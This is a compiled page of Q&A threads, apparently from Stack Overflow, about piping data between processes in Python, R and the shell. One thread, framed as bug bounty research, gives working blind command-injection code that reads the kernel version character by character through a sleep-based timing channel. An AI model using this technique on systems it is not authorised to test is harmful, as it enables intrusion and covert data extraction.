How to run bash logical operators from python - python-3.x

I'm trying to execute:
actual = subprocess.run(['echo 123 | ./ft_ssl md5 -s ' + data + ' -p'], stdout=subprocess.PIPE)
actual = actual.stdout.decode('utf-8')
and after that variable actual equals "123 | ./ft_ssl md5 -s fuck -p\n".
Python run only echo for all the input and ignore | operation.
Help, please, what i have to do to run two commands with this logical operation?

You can avoid echo altogether. Piping can be simulated here by passing the echo argument to the stdin of the call to ./ft_ssl
actual = subprocess.Popen(['./ft_ssl', 'md5', '-s', data, '-p'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
output = actual.communicate(b'123')
See the docs for more details about communicate

Related

Python3 how to pass binary data to stdin when using subprocess.run()?

So how do I pass binary data using stdin to a executable command that I want to run using subprocess.run()?
The documentation is pretty vague about using the stdin for passing the data to external executable. I'm working on linux machine using python3 and I want to invoke dd of=/somefile.data bs=32 (which takes the input from stdin if I understand the man page correctly) and I have the binary data in bytearray that I want to pass to the command through stdin so that I do not have to write it to a temporary file and invoke the dd using that file as a input.
My requirement is simply to pass data that I have in bytearray to the dd command to be written to disk. What is the correct way to achieve this using the subprocess.run() and stdin?
Edit: I meant something like the following:
ba = bytearray(b"some bytes here")
#Run the dd command and pass the data from ba variable to its stdin
You can pass the output of one command to another by calling Popen directly.
file_cmd1 = <your dd command>
file_cmd2 = <command you want to pass dd output to>
proc1 = Popen(sh_split(file_cmd1), stdout=subprocess.PIPE)
proc2 = Popen(file_cmd2, [shell=True], stdin=proc1.stdout, stdout=subprocess.PIPE)
proc1.stdout.close()
This, as far as I know, will work just fine on a byte output from command 1.
In your case what you most like want to do is the following when you just want to pass data to the stdin of the process:
out = bytearray(b"Some data here")
p = subprocess.Popen(sh_split("dd of=/../../somefile.data bs=32"), stdin=subprocess.PIPE)
out = p.communicate(input=b''.join(out))[0]
print(out.decode())#Prints the output from the dd
Specifically for stdin to subprocess.run() as asked by the OP, use input as follows:
#!/usr/bin/python3
import subprocess
data = bytes("Hello, world!", "ascii")
p = subprocess.run(
"cat -", # The - means 'cat from stdin'
input=data,
# stdin=... <-- don't use this
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
print(p.stdout.decode("ascii"))
print(p.returncode)
# Hello, world!
# 0

How can I inject strings into shell scripts when generating them in Python?

I have a script that I am using for a bug bounty program and am running blind code/command injection with.
I have already made the application sleep for 60 seconds based on user id boolean comparisons, so I know it's there.
What I am trying to do now is run shell commands, set them to a shell variable and blindly assess each one char by char, true or false.
The issue I am having is that the the variables I am setting are not being picked up by the host. I am testing this on my local machine at the moment, Kali.
When I print the output of the commands I can see $char for example rather than the shell variable char.
1: kernel_version=$(uname -r);
2: char=$(echo $kernel_version | head -c 1 | tail -c 1);
3: if [[ $char == M ]]; then sleep 60 ; exit; fi
How can I correct the below code so that variable are set and picked up correctly?
def bash_command(self, char, position):
cmd1 = "kernel_version=$(uname -r); "
cmd2 = f"char=$(echo $kernel_version | head -c {position} | tail -c 1); "
op = '==' if char in self.letters + self.numbers else '-eq'
cmd3 = f"if [[ $char {op} {char} ]]; then sleep 60 ; exit; fi"
print("1: " + cmd1)
print("2: " + cmd2)
print("3: " + cmd3)
return cmd1 + cmd2 + cmd3
Full Code:
https://raw.githubusercontent.com/richardcurteis/BugBountyPrograms/master/qc_container_escape.py
To sum up the question: You have a sandbox escape that lets you invoke a shell via os.popen() and determine the time taken by the call (but not the return value), and you want to extract /proc/version by guess-and-check.
The most immediate bug in your original code is that it depended on bash-only syntax, whereas os.popen() uses /bin/sh, which isn't guaranteed to support same.
The other thing that was... highly questionable as a practice (especially as a security researcher!) was the generation of code via string concatenation without any explicit escaping. C'mon -- we, as an industry, can do better than that. Even though os.popen() is a fairly limited channel if you can't set environment variables, one can use shlex.quote() to set values safely, and separate the program being executed from the process setup that precedes it.
shell_cmd = '''
position=$1
test_char=$2
kernel_version=$(uname -r)
found_char=$(printf '%s\n' "$kernel_version" | head -c "$position" | tail -c 1)
[ "$test_char" = "$found_char" ] && sleep 2
'''
import os, shlex, popen, time
def run_with_args(script, args):
args_str = ' '.join([shlex.quote(str(arg)) for arg in args])
set_args_cmd = 'set -- ' + args_str + ';'
# without read(), we don't wait for execution to finish, and can't see timing
os.popen(set_args_cmd + script).read()
def check_char(char, pos):
start_time = time.time()
run_with_args(shell_cmd, [pos+1, char]) # use zero-based offsets like sane people
end_time = time.time()
return end_time - start_time > 1
...whereafter, on a system with a 5.0 kernel, check_char('5', 0) will return True, but check_char('4', 0) will return False.
(Using timing as a channel assumes that there are countermeasures you're overcoming that prevent you from simply reading data from the FIFO that os.popen() returns; of course, if you can possibly do that instead, you should!)

Not getting grep result using popen with cat and multiple process pipes

I am trying to get grep to work using pipes and subprocess. I've double-checked the cat and I know it's working, but for some reason the grep isn't returning anything, even though when I run it through the terminal, it works just fine. I'm wondering if I have the command constructed correctly, as it doesn't give the desired output, and I can't figure out why.
I'm trying to retrieve a few specific lines of data from a file I've already retrieved from a server. I've been having a lot of issues with getting grep to work and perhaps I do not simply understand how it works.
p1 = subprocess.Popen(["cat", "result.txt"], stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
p2 = subprocess.Popen(["grep", "tshaper"], stdin=p1.stdout,
stdout=subprocess.PIPE)
o = p1.communicate()
print(o)
p1.stdout.close()
out, err = p2.communicate()
print(out)
The output for the file I have when I run this command (cat result.txt | grep "tshaper") on the terminal:
tshaper.1.devname=eth0
tshaper.1.input.burst=0
tshaper.1.input.rate=25000
tshaper.1.input.status=enabled
tshaper.1.output.burst=0
tshaper.1.output.rate=25000
tshaper.1.output.status=enabled
tshaper.1.status=enabled
tshaper.status=disabled
My results running the command in the script:
(b'', b'')
where the tuple is the stdout, stderr respectively of the p2 process.
EDIT:
I changed the command based on the Popen documentation to
p1 = subprocess.Popen(['result.txt', 'cat'], shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=os.getcwd())
to the p1 subprocess statement. While I was able to get the output in stderr, it didn't really change anything, saying
(b'', b'cat: 1: cat: result.txt: not found\n')
FYI: You got this error: (b'', b'cat: 1: cat: result.txt: not found\n') because you have changed the seq. of commands in your Popen method: ['result.txt', 'cat'] (Based on your question).
I have written a working solution which provides the expected output.
Python3.6.6 has been used for it.
result.txt file:
I have changed some lines to test the grep command.
tshaper.1.devname=eth0
ashaper.1.input.burst=0
bshaper.1.input.rate=25000
tshaper.1.input.status=enabled
tshaper.1.output.burst=0
cshaper.1.output.rate=25000
tshaper.1.output.status=enabled
dshaper.1.status=enabled
tshaper.status=disabled
Code:
I have made an understandable printing but it is not necessary if you only need the output of grep. (It is a bytesl-like object in Python3)
import subprocess
p1 = subprocess.Popen(['cat', 'result.txt'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p2 = subprocess.check_output(["grep", "tshaper"], stdin=p1.stdout)
print("\n".join(p2.decode("utf-8").split(" ")))
Otuput:
You can see the grep filters the lines from cat command as it is expected.
>>> python3 test.py
tshaper.1.devname=eth0
tshaper.1.input.status=enabled
tshaper.1.output.burst=0
tshaper.1.output.status=enabled
tshaper.status=disabled

How to make R script takes input from pipe and user given parameter

I have the following R script (myscript.r)
#!/usr/bin/env Rscript
dat <- read.table(file('stdin'), sep=" ",header=FALSE)
# do something with dat
# later with user given "param_1"
With that script we can run it the following way;
$ cat data_no_*.txt | ./myscript.r
What I want to do is to make the script takes additional parameter from user:
$ cat data_no_*.txt | ./myscript.r param_1
What should I do to modify the myscript.r to accommodate that?
For very basic usage, have a look at ?commandArgs.
For more complex usage, two popular packages for command-line arguments and options parsing are getopt and optparse. I use them all the time, they get the job done. I also see argparse, argparser, and GetoptLong but have never used them before. One I missed: Dirk recommended that you look at docopt which does seem very nice and easy to use.
Finally, since you seem to be passing arguments via pipes you might find this OpenRead() function useful for generalizing your code and allowing your arguments to be pipes or files.
I wanted to test docopt so putting it all together, your script could look like this:
#!/usr/bin/env Rscript
## Command-line parsing ##
'usage: my_prog.R [-v -m <msg>] <param> <file_arg>
options:
-v verbose
-m <msg> Message' -> doc
library(docopt)
opts <- docopt(doc)
if (opts$v) print(str(opts))
if (!is.null(opts$message)) cat("MESSAGE: ", opts$m)
## File Read ##
OpenRead <- function(arg) {
if (arg %in% c("-", "/dev/stdin")) {
file("stdin", open = "r")
} else if (grepl("^/dev/fd/", arg)) {
fifo(arg, open = "r")
} else {
file(arg, open = "r")
}
}
dat.con <- OpenRead(opts$file_arg)
dat <- read.table(dat.con, sep = " ", header = FALSE)
# do something with dat and opts$param
And you can test running:
echo "1 2 3" | ./test.R -v -m HI param_1 -
or
./test.R -v -m HI param_1 some_file.txt
We built littler to support just that via its r executable.
Have a look at its examples, it may fit your bill.

How to write data to existing process's STDIN from external process?

I'm seeking for ways to write data to the existing process's STDIN from external processes, and found similar question How do you stream data into the STDIN of a program from different local/remote processes in Python? in stackoverlow.
In that thread, #Michael says that we can get file descriptors of existing process in path like below, and permitted to write data into them on Linux.
/proc/$PID/fd/
So, I've created a simple script listed below to test writing data to the script's STDIN (and TTY) from external process.
#!/usr/bin/env python
import os, sys
def get_ttyname():
for f in sys.stdin, sys.stdout, sys.stderr:
if f.isatty():
return os.ttyname(f.fileno())
return None
if __name__ == "__main__":
print("Try commands below")
print("$ echo 'foobar' > {0}".format(get_ttyname()))
print("$ echo 'foobar' > /proc/{0}/fd/0".format(os.getpid()))
print("read :: [" + sys.stdin.readline() + "]")
This test script shows paths of STDIN and TTY and then, wait for one to write it's STDIN.
I launched this script and got messages below.
Try commands below
$ echo 'foobar' > /dev/pts/6
$ echo 'foobar' > /proc/3308/fd/0
So, I executed the command echo 'foobar' > /dev/pts/6 and echo 'foobar' > /proc/3308/fd/0 from other terminal. After execution of both commands, message foobar is displayed twice on the terminal the test script is running on, but that's all. The line print("read :: [" + sys.stdin.readline() + "]") was not executed.
Are there any ways to write data from external processes to the existing process's STDIN (or other file descriptors), i.e. invoke execution of the lineprint("read :: [" + sys.stdin.readline() + "]") from other processes?
Your code will not work.
/proc/pid/fd/0 is a link to the /dev/pts/6 file.
$ echo 'foobar' > /dev/pts/6
$ echo 'foobar' > /proc/pid/fd/0
Since both the commands write to the terminal. This input goes to terminal and not to the process.
It will work if stdin intially is a pipe.
For example, test.py is :
#!/usr/bin/python
import os, sys
if __name__ == "__main__":
print("Try commands below")
print("$ echo 'foobar' > /proc/{0}/fd/0".format(os.getpid()))
while True:
print("read :: [" + sys.stdin.readline() + "]")
pass
Run this as:
$ (while [ 1 ]; do sleep 1; done) | python test.py
Now from another terminal write something to /proc/pid/fd/0 and it will come to test.py
I want to leave here an example I found useful. It's a slight modification of the while true trick above that failed intermittently on my machine.
# pipe cat to your long running process
( cat ) | ./your_server &
server_pid=$!
# send an echo to your cat process that will close cat and in my hypothetical case the server too
echo "quit\n" > "/proc/$server_pid/fd/0"
It was helpful to me because for particular reasons I couldn't use mkfifo, which is perfect for this scenario.

Resources